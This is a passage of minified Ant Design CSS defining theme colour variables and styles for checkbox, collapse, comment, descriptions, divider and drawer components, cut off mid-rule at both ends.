--ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } @-webkit-keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } @keyframes antCheckboxEffect { 0% { transform: scale(1); opacity: 0.5; } 100% { transform: scale(1.6); opacity: 0; } } .ant-checkbox { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; top: 0.2em; line-height: 1; white-space: nowrap; outline: none; cursor: pointer; } .ant-checkbox-wrapper:hover .ant-checkbox-inner, .ant-checkbox:hover .ant-checkbox-inner, .ant-checkbox-input:focus + .ant-checkbox-inner { border-color: var(--ant-primary-color); } .ant-checkbox-checked::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 2px; visibility: hidden; -webkit-animation: antCheckboxEffect 0.36s ease-in-out; animation: antCheckboxEffect 0.36s ease-in-out; -webkit-animation-fill-mode: backwards; animation-fill-mode: backwards; content: ''; } .ant-checkbox:hover::after, .ant-checkbox-wrapper:hover .ant-checkbox::after { visibility: visible; } .ant-checkbox-inner { position: relative; top: 0; left: 0; display: block; width: 16px; height: 16px; direction: ltr; background-color: #fff; border: 1px solid #d9d9d9; border-radius: 2px; border-collapse: separate; transition: all 0.3s; } .ant-checkbox-inner::after { position: absolute; top: 50%; left: 21.5%; display: table; width: 5.71428571px; height: 9.14285714px; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(0) translate(-50%, -50%); opacity: 0; transition: all 0.1s cubic-bezier(0.71, -0.46, 0.88, 0.6), opacity 0.1s; content: ' '; } .ant-checkbox-input { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; width: 100%; height: 100%; cursor: pointer; opacity: 0; } .ant-checkbox-checked .ant-checkbox-inner::after { position: absolute; display: table; border: 2px solid #fff; border-top: 0; border-left: 0; transform: rotate(45deg) scale(1) translate(-50%, -50%); opacity: 1; transition: all 0.2s cubic-bezier(0.12, 0.4, 0.29, 1.46) 0.1s; content: ' '; } .ant-checkbox-checked .ant-checkbox-inner { background-color: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-checkbox-disabled { cursor: not-allowed; } .ant-checkbox-disabled.ant-checkbox-checked .ant-checkbox-inner::after { border-color: rgba(0, 0, 0, 0.25); -webkit-animation-name: none; animation-name: none; } .ant-checkbox-disabled .ant-checkbox-input { cursor: not-allowed; } .ant-checkbox-disabled .ant-checkbox-inner { background-color: #f5f5f5; border-color: #d9d9d9 !important; } .ant-checkbox-disabled .ant-checkbox-inner::after { border-color: #f5f5f5; border-collapse: separate; -webkit-animation-name: none; animation-name: none; } .ant-checkbox-disabled + span { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-checkbox-disabled:hover::after, .ant-checkbox-wrapper:hover .ant-checkbox-disabled::after { visibility: hidden; } .ant-checkbox-wrapper { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-flex; align-items: baseline; line-height: unset; cursor: pointer; } .ant-checkbox-wrapper::after { display: inline-block; width: 0; overflow: hidden; content: '\a0'; } .ant-checkbox-wrapper.ant-checkbox-wrapper-disabled { cursor: not-allowed; } .ant-checkbox-wrapper + .ant-checkbox-wrapper { margin-left: 8px; } .ant-checkbox + span { padding-right: 8px; padding-left: 8px; } .ant-checkbox-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; } .ant-checkbox-group-item { margin-right: 8px; } .ant-checkbox-group-item:last-child { margin-right: 0; } .ant-checkbox-group-item + .ant-checkbox-group-item { margin-left: 0; } .ant-checkbox-indeterminate .ant-checkbox-inner { background-color: #fff; border-color: #d9d9d9; } .ant-checkbox-indeterminate .ant-checkbox-inner::after { top: 50%; left: 50%; width: 8px; height: 8px; background-color: var(--ant-primary-color); border: 0; transform: translate(-50%, -50%) scale(1); opacity: 1; content: ' '; } .ant-checkbox-indeterminate.ant-checkbox-disabled .ant-checkbox-inner::after { background-color: rgba(0, 0, 0, 0.25); border-color: rgba(0, 0, 0, 0.25); } .ant-checkbox-rtl { direction: rtl; } .ant-checkbox-group-rtl .ant-checkbox-group-item { margin-right: 0; margin-left: 8px; } .ant-checkbox-group-rtl .ant-checkbox-group-item:last-child { margin-left: 0 !important; } .ant-checkbox-group-rtl .ant-checkbox-group-item + .ant-checkbox-group-item { margin-left: 8px; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-collapse { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; background-color: #fafafa; border: 1px solid #d9d9d9; border-bottom: 0; border-radius: 2px; } .ant-collapse > .ant-collapse-item { border-bottom: 1px solid #d9d9d9; } .ant-collapse > .ant-collapse-item:last-child, .ant-collapse > .ant-collapse-item:last-child > .ant-collapse-header { border-radius: 0 0 2px 2px; } .ant-collapse > .ant-collapse-item > .ant-collapse-header { position: relative; display: flex; flex-wrap: nowrap; align-items: flex-start; padding: 12px 16px; color: rgba(0, 0, 0, 0.85); line-height: 1.5715; cursor: pointer; transition: all 0.3s, visibility 0s; } .ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-arrow { display: inline-block; margin-right: 12px; font-size: 12px; vertical-align: -1px; } .ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-arrow svg { transition: transform 0.24s; } .ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-extra { margin-left: auto; } .ant-collapse > .ant-collapse-item > .ant-collapse-header:focus { outline: none; } .ant-collapse > .ant-collapse-item .ant-collapse-header-collapsible-only { cursor: default; } .ant-collapse > .ant-collapse-item .ant-collapse-header-collapsible-only .ant-collapse-header-text { cursor: pointer; } .ant-collapse > .ant-collapse-item.ant-collapse-no-arrow > .ant-collapse-header { padding-left: 12px; } .ant-collapse-icon-position-right > .ant-collapse-item > .ant-collapse-header { position: relative; padding: 12px 16px; padding-right: 40px; } .ant-collapse-icon-position-right > .ant-collapse-item > .ant-collapse-header .ant-collapse-arrow { position: absolute; top: 50%; right: 16px; left: auto; margin: 0; transform: translateY(-50%); } .ant-collapse-content { color: rgba(0, 0, 0, 0.85); background-color: #fff; border-top: 1px solid #d9d9d9; } .ant-collapse-content > .ant-collapse-content-box { padding: 16px; } .ant-collapse-content-hidden { display: none; } .ant-collapse-item:last-child > .ant-collapse-content { border-radius: 0 0 2px 2px; } .ant-collapse-borderless { background-color: #fafafa; border: 0; } .ant-collapse-borderless > .ant-collapse-item { border-bottom: 1px solid #d9d9d9; } .ant-collapse-borderless > .ant-collapse-item:last-child, .ant-collapse-borderless > .ant-collapse-item:last-child .ant-collapse-header { border-radius: 0; } .ant-collapse-borderless > .ant-collapse-item > .ant-collapse-content { background-color: transparent; border-top: 0; } .ant-collapse-borderless > .ant-collapse-item > .ant-collapse-content > .ant-collapse-content-box { padding-top: 4px; } .ant-collapse-ghost { background-color: transparent; border: 0; } .ant-collapse-ghost > .ant-collapse-item { border-bottom: 0; } .ant-collapse-ghost > .ant-collapse-item > .ant-collapse-content { background-color: transparent; border-top: 0; } .ant-collapse-ghost > .ant-collapse-item > .ant-collapse-content > .ant-collapse-content-box { padding-top: 12px; padding-bottom: 12px; } .ant-collapse .ant-collapse-item-disabled > .ant-collapse-header, .ant-collapse .ant-collapse-item-disabled > .ant-collapse-header > .arrow { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } .ant-collapse-rtl { direction: rtl; } .ant-collapse-rtl .ant-collapse > .ant-collapse-item > .ant-collapse-header { padding: 12px 16px; padding-right: 40px; } .ant-collapse-rtl.ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-arrow { margin-right: 0; margin-left: 12px; } .ant-collapse-rtl.ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-arrow svg { transform: rotate(180deg); } .ant-collapse-rtl.ant-collapse > .ant-collapse-item > .ant-collapse-header .ant-collapse-extra { margin-right: auto; margin-left: 0; } .ant-collapse-rtl.ant-collapse > .ant-collapse-item.ant-collapse-no-arrow > .ant-collapse-header { padding-right: 12px; padding-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-comment { position: relative; background-color: inherit; } .ant-comment-inner { display: flex; padding: 16px 0; } .ant-comment-avatar { position: relative; flex-shrink: 0; margin-right: 12px; cursor: pointer; } .ant-comment-avatar img { width: 32px; height: 32px; border-radius: 50%; } .ant-comment-content { position: relative; flex: 1 1 auto; min-width: 1px; font-size: 14px; word-wrap: break-word; } .ant-comment-content-author { display: flex; flex-wrap: wrap; justify-content: flex-start; margin-bottom: 4px; font-size: 14px; } .ant-comment-content-author > a, .ant-comment-content-author > span { padding-right: 8px; font-size: 12px; line-height: 18px; } .ant-comment-content-author-name { color: rgba(0, 0, 0, 0.45); font-size: 14px; transition: color 0.3s; } .ant-comment-content-author-name > * { color: rgba(0, 0, 0, 0.45); } .ant-comment-content-author-name > *:hover { color: rgba(0, 0, 0, 0.45); } .ant-comment-content-author-time { color: #ccc; white-space: nowrap; cursor: auto; } .ant-comment-content-detail p { margin-bottom: inherit; white-space: pre-wrap; } .ant-comment-actions { margin-top: 12px; margin-bottom: inherit; padding-left: 0; } .ant-comment-actions > li { display: inline-block; color: rgba(0, 0, 0, 0.45); } .ant-comment-actions > li > span { margin-right: 10px; color: rgba(0, 0, 0, 0.45); font-size: 12px; cursor: pointer; transition: color 0.3s; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-comment-actions > li > span:hover { color: #595959; } .ant-comment-nested { margin-left: 44px; } .ant-comment-rtl { direction: rtl; } .ant-comment-rtl .ant-comment-avatar { margin-right: 0; margin-left: 12px; } .ant-comment-rtl .ant-comment-content-author > a, .ant-comment-rtl .ant-comment-content-author > span { padding-right: 0; padding-left: 8px; } .ant-comment-rtl .ant-comment-actions { padding-right: 0; } .ant-comment-rtl .ant-comment-actions > li > span { margin-right: 0; margin-left: 10px; } .ant-comment-rtl .ant-comment-nested { margin-right: 44px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-descriptions-header { display: flex; align-items: center; margin-bottom: 20px; } .ant-descriptions-title { flex: auto; overflow: hidden; color: rgba(0, 0, 0, 0.85); font-weight: bold; font-size: 16px; line-height: 1.5715; white-space: nowrap; text-overflow: ellipsis; } .ant-descriptions-extra { margin-left: auto; color: rgba(0, 0, 0, 0.85); font-size: 14px; } .ant-descriptions-view { width: 100%; border-radius: 2px; } .ant-descriptions-view table { width: 100%; table-layout: fixed; } .ant-descriptions-row > th, .ant-descriptions-row > td { padding-bottom: 16px; } .ant-descriptions-row:last-child { border-bottom: none; } .ant-descriptions-item-label { color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; line-height: 1.5715; text-align: start; } .ant-descriptions-item-label::after { content: ':'; position: relative; top: -0.5px; margin: 0 8px 0 2px; } .ant-descriptions-item-label.ant-descriptions-item-no-colon::after { content: ' '; } .ant-descriptions-item-no-label::after { margin: 0; content: ''; } .ant-descriptions-item-content { display: table-cell; flex: 1; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; word-break: break-word; overflow-wrap: break-word; } .ant-descriptions-item { padding-bottom: 0; vertical-align: top; } .ant-descriptions-item-container { display: flex; } .ant-descriptions-item-container .ant-descriptions-item-label, .ant-descriptions-item-container .ant-descriptions-item-content { display: inline-flex; align-items: baseline; } .ant-descriptions-middle .ant-descriptions-row > th, .ant-descriptions-middle .ant-descriptions-row > td { padding-bottom: 12px; } .ant-descriptions-small .ant-descriptions-row > th, .ant-descriptions-small .ant-descriptions-row > td { padding-bottom: 8px; } .ant-descriptions-bordered .ant-descriptions-view { border: 1px solid #f0f0f0; } .ant-descriptions-bordered .ant-descriptions-view > table { table-layout: auto; border-collapse: collapse; } .ant-descriptions-bordered .ant-descriptions-item-label, .ant-descriptions-bordered .ant-descriptions-item-content { padding: 16px 24px; border-right: 1px solid #f0f0f0; } .ant-descriptions-bordered .ant-descriptions-item-label:last-child, .ant-descriptions-bordered .ant-descriptions-item-content:last-child { border-right: none; } .ant-descriptions-bordered .ant-descriptions-item-label { background-color: #fafafa; } .ant-descriptions-bordered .ant-descriptions-item-label::after { display: none; } .ant-descriptions-bordered .ant-descriptions-row { border-bottom: 1px solid #f0f0f0; } .ant-descriptions-bordered .ant-descriptions-row:last-child { border-bottom: none; } .ant-descriptions-bordered.ant-descriptions-middle .ant-descriptions-item-label, .ant-descriptions-bordered.ant-descriptions-middle .ant-descriptions-item-content { padding: 12px 24px; } .ant-descriptions-bordered.ant-descriptions-small .ant-descriptions-item-label, .ant-descriptions-bordered.ant-descriptions-small .ant-descriptions-item-content { padding: 8px 16px; } .ant-descriptions-rtl { direction: rtl; } .ant-descriptions-rtl .ant-descriptions-item-label::after { margin: 0 2px 0 8px; } .ant-descriptions-rtl.ant-descriptions-bordered .ant-descriptions-item-label, .ant-descriptions-rtl.ant-descriptions-bordered .ant-descriptions-item-content { border-right: none; border-left: 1px solid #f0f0f0; } .ant-descriptions-rtl.ant-descriptions-bordered .ant-descriptions-item-label:last-child, .ant-descriptions-rtl.ant-descriptions-bordered .ant-descriptions-item-content:last-child { border-left: none; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-divider { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; border-top: 1px solid rgba(0, 0, 0, 0.06); } .ant-divider-vertical { position: relative; top: -0.06em; display: inline-block; height: 0.9em; margin: 0 8px; vertical-align: middle; border-top: 0; border-left: 1px solid rgba(0, 0, 0, 0.06); } .ant-divider-horizontal { display: flex; clear: both; width: 100%; min-width: 100%; margin: 24px 0; } .ant-divider-horizontal.ant-divider-with-text { display: flex; margin: 16px 0; color: rgba(0, 0, 0, 0.85); font-weight: 500; font-size: 16px; white-space: nowrap; text-align: center; border-top: 0; border-top-color: rgba(0, 0, 0, 0.06); } .ant-divider-horizontal.ant-divider-with-text::before, .ant-divider-horizontal.ant-divider-with-text::after { position: relative; top: 50%; width: 50%; border-top: 1px solid transparent; border-top-color: inherit; border-bottom: 0; transform: translateY(50%); content: ''; } .ant-divider-horizontal.ant-divider-with-text-left::before { top: 50%; width: 5%; } .ant-divider-horizontal.ant-divider-with-text-left::after { top: 50%; width: 95%; } .ant-divider-horizontal.ant-divider-with-text-right::before { top: 50%; width: 95%; } .ant-divider-horizontal.ant-divider-with-text-right::after { top: 50%; width: 5%; } .ant-divider-inner-text { display: inline-block; padding: 0 1em; } .ant-divider-dashed { background: none; border-color: rgba(0, 0, 0, 0.06); border-style: dashed; border-width: 1px 0 0; } .ant-divider-horizontal.ant-divider-with-text.ant-divider-dashed { border-top: 0; } .ant-divider-horizontal.ant-divider-with-text.ant-divider-dashed::before, .ant-divider-horizontal.ant-divider-with-text.ant-divider-dashed::after { border-style: dashed none none; } .ant-divider-vertical.ant-divider-dashed { border-width: 0 0 0 1px; } .ant-divider-plain.ant-divider-with-text { color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; } .ant-divider-horizontal.ant-divider-with-text-left.ant-divider-no-default-orientation-margin-left::before { width: 0; } .ant-divider-horizontal.ant-divider-with-text-left.ant-divider-no-default-orientation-margin-left::after { width: 100%; } .ant-divider-horizontal.ant-divider-with-text-left.ant-divider-no-default-orientation-margin-left .ant-divider-inner-text { padding-left: 0; } .ant-divider-horizontal.ant-divider-with-text-right.ant-divider-no-default-orientation-margin-right::before { width: 100%; } .ant-divider-horizontal.ant-divider-with-text-right.ant-divider-no-default-orientation-margin-right::after { width: 0; } .ant-divider-horizontal.ant-divider-with-text-right.ant-divider-no-default-orientation-margin-right .ant-divider-inner-text { padding-right: 0; } .ant-divider-rtl { direction: rtl; } .ant-divider-rtl.ant-divider-horizontal.ant-divider-with-text-left::before { width: 95%; } .ant-divider-rtl.ant-divider-horizontal.ant-divider-with-text-left::after { width: 5%; } .ant-divider-rtl.ant-divider-horizontal.ant-divider-with-text-right::before { width: 5%; } .ant-divider-rtl.ant-divider-horizontal.ant-divider-with-text-right::after { width: 95%; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-drawer { position: fixed; z-index: 1000; width: 0%; height: 100%; transition: width 0s ease 0.3s, height 0s ease 0.3s; } .ant-drawer-content-wrapper { position: absolute; width: 100%; height: 100%; transition: transform 0.3s cubic-bezier(0.23, 1, 0.32, 1), box-shadow 0.3s cubic-bezier(0.23, 1, 0.32, 1); } .ant-drawer .ant-drawer-content { width: 100%; height: 100%; } .ant-drawer-left, .ant-drawer-right { top: 0; width: 0%; height: 100%; } .ant-drawer-left .ant-drawer-content-wrapper, .ant-drawer-right .ant-drawer-content-wrapper { height: 100%; } .ant-drawer-left.ant-drawer-open, .ant-drawer-right.ant-drawer-open { width: 100%; transition: transform 0.3s cubic-bezier(0.23, 1, 0.32, 1); } .ant-drawer-left { left: 0; } .ant-drawer-left .ant-drawer-content-wrapper { left: 0; } .ant-drawer-left.ant-drawer-open .ant-drawer-content-wrapper { box-shadow: 6px 0 16px -8px rgba(0, 0, 0, 0.08), 9px 0 28px 0 rgba(0, 0, 0, 0.05), 12px 0 48px 16px rgba(0, 0, 0, 0.03); } .ant-drawer-right { right: 0; } .ant-drawer-right .ant-drawer-content-wrapper { right: 0; } .ant-drawer-right.ant-drawer-open .ant-drawer-content-wrapper { box-shadow: -6px 0 16px -8px rgba(0, 0, 0, 0.08), -9px 0 28px 0 rgba(0, 0, 0, 0.05), -12px 0 48px 16px rgba(0, 0, 0, 0.03); } .ant-drawer-right.ant-drawer-open.no-mask { right: 1px; transform: translateX(1px); } .ant-drawer-top, .ant-drawer-bottom { left: 0; width: 100%; height: 0%; } .ant-drawer-top .ant-drawer-content-wrapper, .ant-drawer-bottom .ant-drawer-content-wrapper { width: 100%; } .ant-drawer-top.ant-drawer-open, .ant-drawer-bottom.ant-drawer-open { height: 100%; transition: transform 0.3s cubic-bezier(0.23, 1, 0.32, 1); } .ant-drawer-top { 